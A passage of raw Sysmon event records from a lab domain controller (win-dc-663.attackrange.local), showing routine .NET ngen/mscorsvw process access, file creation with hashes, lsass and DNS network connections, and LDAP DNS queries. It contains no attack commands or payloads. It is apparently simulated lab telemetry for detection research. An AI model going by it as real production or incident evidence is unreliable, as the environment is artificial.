indows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.170{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.123{4DB9351A-A11A-60D3-7B02-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8X6BRPO3U6\System.Messaging.ni.dll.auxMD5=60C1E905E22120D976121EF5738ED442,SHA256=54D4DA40B3148DEBD43E6A22E3B9C5B2A28B231BC43BBB22EE94A9DE683EDACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.123{4DB9351A-A11A-60D3-7B02-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8X6BRPO3U6\System.Messaging.ni.dllMD5=93836605808A835064C0F896A6BEA90B,SHA256=C2CE62779710EF3C2D2D2690D970F219B84DE490C92AEC2376257F8DE59EC5EE,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.092{4DB9351A-A11A-60D3-7B02-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1aec-0\System.Messaging.dll2021-06-23 21:01:15.092 354300x800000000000000018920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.833{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61368-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000018919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.833{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61368-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000018918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.832{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61367-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000018917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.832{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61367-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 23542300x800000000000000018916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2751FA361AC61CB8EB32D995AB168E0,SHA256=E9B9A3CFA74065A5B89220FE4D757C9412608011997587A5365A25EEF2726654,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.607{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.607{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11C-60D3-8302-00000000CF01}6252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC55F17659CC1B143E3536111B4FF39D,SHA256=E410B5CF5F0ADD0FDC1D25D6F00F681FF0A03C8F0E01F0FA9458068CF340F8E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.170{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.154{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.154{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11C-60D3-8202-00000000CF01}7000C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.107{4DB9351A-A11B-60D3-8102-00000000CF01}7020NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUVBO6CEG4\System.Numerics.ni.dll.auxMD5=90107E341C19D3117700EA484B28F25B,SHA256=B2539461BFCF88012F3ABFA57261F693D6B4EE7C20D5D41C3E7A8447FFB50D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:16.107{4DB9351A-A11B-60D3-8102-00000000CF01}7020NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUVBO6CEG4\System.Numerics.ni.dllMD5=AB61CB545A9DC24A8ED57E1F509C2486,SHA256=9749BAAA95919E74765F39646D85EA7C1C151F77E0BCF564C0C8D603C45E4B3D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:16.092{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b6c-0\System.Numerics.dll2021-06-23 21:01:16.092 10341000x800000000000000018954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.982{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.982{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.920{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.920{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11D-60D3-8602-00000000CF01}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.857{4DB9351A-A11D-60D3-8502-00000000CF01}5648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JKO6Q1HCHQ\System.Reflection.Context.ni.dll.auxMD5=5C47900FF167EB523C27C73B02811BBD,SHA256=C24E3DCA6E4F7BA73CEE71B59EDF9B6AAC5B3102BA2BB32136D4E263A3FA72E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.857{4DB9351A-A11D-60D3-8502-00000000CF01}5648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JKO6Q1HCHQ\System.Reflection.Context.ni.dllMD5=E4DA61B682A05A204B50B410C15A57AB,SHA256=0302FC9D8E6E766D55212EF2009D46616ADB91748DCF42C299807389B89F9227,IMPHASH=00000000000000000000000000000000truetrue 22542200x800000000000000018947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.856{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.855{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.853{4DB9351A-9DDB-60D3-0B00-00000000CF01}628ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.851{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x800000000000000018943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.850{4DB9351A-9DDB-60D3-0B00-00000000CF01}628_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x800000000000000018942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.849{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local57688- 354300x800000000000000018941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.847{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local50944- 354300x800000000000000018940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.847{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55455- 354300x800000000000000018939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.845{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58662- 22542200x800000000000000018938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.848{4DB9351A-9DDB-60D3-0B00-00000000CF01}628DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x800000000000000018937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.844{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local56995- 354300x800000000000000018936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.844{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60447- 354300x800000000000000018935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.843{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49962- 354300x800000000000000018934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.841{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local49381- 354300x800000000000000018933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.840{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60254- 11241100x800000000000000018932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:17.827{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1610-0\System.Reflection.Context.dll2021-06-23 21:01:17.827 23542300x800000000000000018931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=795337EBBF5956EA10B0D4333B6509DE,SHA256=918DF28B54007E38945DE7955F48C0688741BF067C660706D2E829556BD05042,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8502-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 